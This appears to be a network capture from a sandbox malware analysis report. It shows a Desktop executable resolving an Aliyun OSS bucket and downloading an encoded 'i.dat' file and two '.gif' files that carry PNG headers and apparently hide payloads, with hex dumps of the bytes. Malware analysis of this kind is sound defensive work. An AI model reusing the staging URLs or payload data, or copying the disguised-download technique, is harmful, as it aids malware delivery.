                                    Jan 11, 2025 04:38:01.851526976 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.851584911 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.851622105 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.851803064 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.943548918 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.943572044 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.943588018 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.943597078 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.943686008 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.943696022 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.943759918 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:02.372133970 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:02.430646896 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:02.994688034 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:02.994723082 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:03.214190006 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:03.214240074 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:03.214343071 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:03.214569092 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:03.214577913 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:04.991090059 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:04.991348028 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:04.992386103 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:04.992397070 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:04.992841005 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:04.992846012 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.332484961 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.332505941 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.332540989 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.332561016 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.332571983 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.332614899 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.333956957 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.334033966 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.335618019 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.335678101 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.337587118 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.337641954 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.421396017 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.421463013 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.421504974 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.421516895 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.421555996 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.421902895 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.421952009 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.421960115 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.421993971 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.421998978 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.422029018 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.422611952 CET49723443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.422626019 CET4434972339.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.441342115 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.441380024 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:05.441452026 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.441670895 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:05.441682100 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:06.697196007 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:06.697401047 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:06.697963953 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:06.697977066 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:06.698168993 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:06.698174000 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.025526047 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.025547981 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.025650024 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.025666952 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.025712967 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.026235104 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.026278019 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.026285887 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.026321888 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.027364969 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.027407885 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.027424097 CET4434972439.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:07.027460098 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.031574011 CET49724443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:07.031593084 CET4434972439.103.20.105192.168.2.12
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 11, 2025 04:37:45.985466003 CET6451753192.168.2.121.1.1.1
                                    Jan 11, 2025 04:37:46.128492117 CET53645171.1.1.1192.168.2.12
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 11, 2025 04:37:45.985466003 CET192.168.2.121.1.1.10x2ad1Standard query (0)662hfg.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 11, 2025 04:37:46.128492117 CET1.1.1.1192.168.2.120x2ad1No error (0)662hfg.oss-cn-beijing.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 11, 2025 04:37:46.128492117 CET1.1.1.1192.168.2.120x2ad1No error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 11, 2025 04:37:46.128492117 CET1.1.1.1192.168.2.120x2ad1No error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.105A (IP address)IN (0x0001)false
                                    • 662hfg.oss-cn-beijing.aliyuncs.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.124971839.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:37:47 UTC111OUTGET /i.dat HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:37:47 UTC558INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:37:47 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 512
                                    Connection: close
                                    x-oss-request-id: 6781E78BA08151343742D2C8
                                    Accept-Ranges: bytes
                                    ETag: "A1CC6E3DD3069453BEF8913F9698C666"
                                    Last-Modified: Fri, 10 Jan 2025 12:35:03 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 15148768218617465077
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: ocxuPdMGlFO++JE/lpjGZg==
                                    x-oss-server-time: 3
                                    2025-01-11 03:37:47 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 06 06 02 58 3e 3f 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 50 50 54 0e 68 69 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 05 05 01 5b 3d 3c 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 51 51 55 0f 69 68 21
                                    Data Ascii: l%00X>?v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffPPThi aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[=<u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rggQQUih!


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.124971939.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:37:49 UTC111OUTGET /a.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:37:49 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:37:49 GMT
                                    Content-Type: image/gif
                                    Content-Length: 135589
                                    Connection: close
                                    x-oss-request-id: 6781E78DF15BB232316055BD
                                    Accept-Ranges: bytes
                                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                    Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 8642451798640735006
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                    x-oss-server-time: 14
                                    2025-01-11 03:37:49 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-11 03:37:49 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                    2025-01-11 03:37:49 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                    Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                    2025-01-11 03:37:49 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                    Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                    2025-01-11 03:37:49 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                    2025-01-11 03:37:49 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                    2025-01-11 03:37:49 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                    2025-01-11 03:37:49 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                    2025-01-11 03:37:49 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                    Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                    2025-01-11 03:37:49 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                    Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.124972039.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:37:51 UTC111OUTGET /b.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:37:51 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:37:51 GMT
                                    Content-Type: image/gif
                                    Content-Length: 125333
                                    Connection: close
                                    x-oss-request-id: 6781E78F6AD6D5353680589A
                                    Accept-Ranges: bytes
                                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                    Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10333201072197591521
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                    x-oss-server-time: 3
                                    2025-01-11 03:37:51 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
